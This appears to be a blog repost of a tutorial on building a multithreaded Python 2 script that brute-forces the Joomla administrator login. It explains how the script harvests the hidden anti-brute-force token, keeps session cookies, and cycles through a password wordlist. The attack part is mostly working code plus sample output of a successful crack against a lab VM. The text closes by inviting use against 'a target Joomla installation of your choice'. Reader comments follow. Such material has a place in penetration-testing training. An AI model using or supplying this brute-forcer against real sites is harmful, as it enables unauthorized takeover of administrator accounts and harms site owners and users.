
How To Brute-Force HTML Form Authentication In Python
What Is HTML Form Authentication

HTML form-based authentication, typically presently colloquially referred to as simply form-based authentication, is a technique whereby a website uses a web form to collect, and subsequently authenticate, credential information from a user agent, typically a web browser. (Note that the phrase “form-based authentication” is ambiguous. See form-based authentication for further explanation.)
Brute-Forcing HTML Form Authentication
There may come a time in your web hacking career where you need to either gain access to a target, or if you’re consulting, you might need to assess the password strength on an existing web system. It has become more and more common for web systems to have brute-force protection, whether a captcha, a simple math equation, or a login token that has to be submitted with the request. There are a number of brute forcers that can do the brute-forcing of a POST request to the login script, but in a lot of cases they are not flexible enough to deal with dynamic content or handle simple “are you human” checks. We’ll create a simple brute forcer that will be useful against Joomla, a popular content management system. Modern Joomla systems include some basic anti-brute-force techniques, but still lack account lockouts or strong captchas by default. In order to brute-force Joomla, we have two requirements that need to be met: retrieve the login token from the login form before submitting the password attempt and ensure that we accept cookies in our urllib2 session.
In order to parse out the login form values, we’ll use the native Python class HTMLParser. This will also be a good whirlwind tour of some additional features of urllib2 that you can employ when building tooling for your own targets. Let’s get started by having a look at the Joomla administrator login form. This can be found by browsing to http://<yourtarget>.com/administrator/. For the sake of brevity, I’ve only included the relevant form elements.
<form action="/administrator/index.php" method="post" id="form-login"
class="form-inline">
<input name="username" tabindex="1" id="mod-login-username" type="text"
class="input-medium" placeholder="User Name" size="15"/>
<input name="passwd" tabindex="2" id="mod-login-password" type="password"
class="input-medium" placeholder="Password" size="15"/>
<select id="lang" name="lang" class="inputbox advancedSelect">
<option value="" selected="selected">Language - Default</option>
<option value="en-GB">English (United Kingdom)</option>
</select>
<input type="hidden" name="option" value="com_login"/>
<input type="hidden" name="task" value="login"/>
<input type="hidden" name="return" value="aW5kZXgucGhw"/>
<input type="hidden" name="1796bae450f8430ba0d2de1656f3e0ec" value="1" />
</form>
Reading through this form, we are privy to some valuable informa- tion that we’ll need to incorporate into our brute forcer. The first is that the form gets submitted to the /administrator/index.php path as an HTTP POST. The next are all of the fields required in order for the form sub- mission to be successful. In particular, if you look at the last hidden field, you’ll see that its name attribute is set to a long, randomized string. This is the essential piece of Joomla’s anti-brute-forcing technique. That ran- domized string is checked against your current user session, stored in a cookie, and even if you are passing the correct credentials into the login processing script, if the randomized token is not present, the authentica- tion will fail. This means we have to use the following request flow in our brute forcer in order to be successful against Joomla:
- Retrieve the login page, and accept all cookies that are returned.
- Parse out all of the form elements from the HTML.
- Set the username and/or password to a guess from our dictionary.
- Send an HTTP POST to the login processing script including all
HTML form fields and our stored cookies. - Test to see if we have successfully logged in to the web application.
You can see that we are going to be utilizing some new and valuable techniques in this script. I will also mention that you should never “train” your tooling on a live target; always set up an installation of your target web application with known credentials and verify that you get the desired results.
Let’s open a new Python file named joomla_killer.py and enter the following code:
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue
from HTMLParser import HTMLParser
# general settings
user_thread = 10
username = "admin"
wordlist_file = "/tmp/cain.txt"
resume = None
# target specific settings
target_url = "http://192.168.112.131/administrator/index.php"
target_post = "http://192.168.112.131/administrator/index.php"
These general settings deserve a bit of explanation. The target_url variable is where our script will first download and parse the HTML. The target_post variable is where we will submit our brute-forcing attempt.
username_field= "username"
password_field= "passwd"
success_check = "Administration - Control Panel"
Based on our brief analysis of the HTML in the Joomla login, we can set the username_field and password_field variables to the appropriate name of the HTML elements. Our success_check variable is a string that we’ll check for after each brute-forcing attempt in order to determine whether we are successful or not.
Let’s now create the plumbing for our brute forcer; some of the following code will be familiar so I’ll only highlight the newest techniques.
class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False
print "Finished setting up for: %s" % username
def run_bruteforce(self):
for i in range(user_thread):
t = threading.Thread(target=self.web_bruter)
t.start()
def web_bruter(self):
while not self.password_q.empty() and not self.found:
brute = self.password_q.get().rstrip()
jar = cookielib.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
response = opener.open(target_url)
page = response.read()
print "Trying: %s : %s (%d left)" % (self.username,brute,self.password_q.qsize())
This is our primary brute-forcing class, which will handle all of the HTTP requests and manage cookies for us. After we grab our password attempt, we set up our cookie jar using the FileCookieJar class that will store the cookies in the cookies file. Next we initialize our urllib2 opener, passing in the initialized cookie jar, which tells urllib2 to pass off any cookies to it. We then make the initial request to retrieve the login form.
# parse out the hidden fields
parser = BruteParser()
parser.feed(page)
post_tags = parser.tag_results
When we have the raw HTML, we pass it off to our HTML parser and call its feed method, which returns a dictionary of all of the retrieved form elements.
# add our username and password fields
post_tags[username_field] = self.username
post_tags[password_field] = brute
After we have successfully parsed the HTML, we replace the username and password fields with our brute-forcing attempt.
login_data = urllib.urlencode(post_tags)
login_response = opener.open(target_post, login_data)
login_result = login_response.read()
Next we URL encode the POST variables, and then pass them in our subsequent HTTP request.
if success_check in login_result:
self.found = True
print "[*] Bruteforce successful."
print "[*] Username: %s" % username
print "[*] Password: %s" % brute
print "[*] Waiting for other threads to exit..."
After we retrieve the result of our authentication attempt, we test whether the authentication was successful or not.
Now let’s imple- ment the core of our HTML processing. Add the following class to your joomla_killer.py script:
class BruteParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.tag_results = {}
This forms the specific HTML parsing class that we want to use against our target. After you have the basics of using the HTMLParser class, you can adapt it to extract information from any web application that you might be attacking. The first thing we do is create a dictionary in which our results will be stored.
def handle_starttag(self, tag, attrs):
if tag == "input":
tag_name = None
tag_value = None
When we call the feed function, it passes in the entire HTML document and our handle_starttag function is called whenever a tag is encountered. In particular, we’re looking for HTML input tags and our main processing occurs when we determine that we have found one.
for name,value in attrs:
if name == "name":
tag_name = value
if name == "value":
tag_value = value
if tag_name is not None:
self.tag_results[tag_name] = value
We begin iterating over the attributes of the tag, and if we find the name or value attributes, we associate them in the tag_results dictionary. After the HTML has been processed, our brute- forcing class can then replace the username and password fields while leaving the remainder of the fields intact.
To wrap up our Joomla brute forcer, let’s copy-paste the build_wordlist function from our previous section and add the following code:
# paste the build_wordlist function here
words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username,words)
bruter_obj.run_bruteforce()
That’s it! We simply pass in the username and our wordlist to our Bruter class and watch the magic happen.
HTMLParser 101

There are three primary methods you can implement when using the HTMLParser class: handle_starttag, handle_endtag, and handle_data. The handle_starttag function will be called any time an opening HTML tag is encountered, and the opposite is true for the handle_endtag function, which gets called each time a closing HTML tag is encountered. The handle_data function gets called when there is raw text in between tags. The function prototypes for each function are slightly different, as follows:
handle_starttag(self, tag, attributes)
handle_endttag(self, tag)
handle_data(self, data)
A quick example to highlight this:
<title>Python rocks!</title>
handle_starttag => tag variable would be "title"
handle_data => data variable would be "Python rocks!"
handle_endtag => tag variable would be "title"
With this very basic understanding of the HTMLParser class, you can do things like parse forms, find links for spidering, extract all of the pure text for data mining purposes, or find all of the images in a page.
Let’s Check Our Code

If you don’t have Joomla installed into your Kali VM, then you should install it now. My target VM is at 192.168.112.131 and I am using a wordlist provided by Cain and Abel,3 a popular brute-forcing and cracking toolset. I have already preset the username to admin and the password to justin in the Joomla installation so that I can make sure it works. I then added justin to the cain.txt wordlist file about 50 entries or so down the file. When run- ning the script, I get the following output:
$ python2.7 joomla_killer.py
Finished setting up for: admin
Trying: admin : 0racl38 (306697 left)
Trying: admin : !@#$% (306697 left)
Trying: admin : !@#$%^ (306697 left)
--snip--
Trying: admin : 1p2o3i (306659 left)
Trying: admin : 1qw23e (306657 left)
Trying: admin : 1q2w3e (306656 left)
Trying: admin : 1sanjose (306655 left)
Trying: admin : 2 (306655 left)
Trying: admin : justin (306655 left)
Trying: admin : 2112 (306646 left)
[*] Bruteforce successful.
[*] Username: admin
[*] Password: justin
[*] Waiting for other threads to exit...
Trying: admin : 249 (306646 left)
Trying: admin : 2welcome (306646 left)
You can see that it successfully brute-forces and logs in to the Joomla administrator console. To verify, you of course would manually log in and make sure. After you test this locally and you’re certain it works, you can use this tool against a target Joomla installation of your choice.
Also Check How To Brute-Force Directories and File Locations using Python.
I think the admin of this web page is in fact working hard for his site, because here every
data is quality based information.
Hey! I know this is kinda off topic but I was wondering if
you knew where I could find a captcha plugin for my comment form?
I’m using the same blog platform as yours and I’m having problems finding
one? Thanks a lot!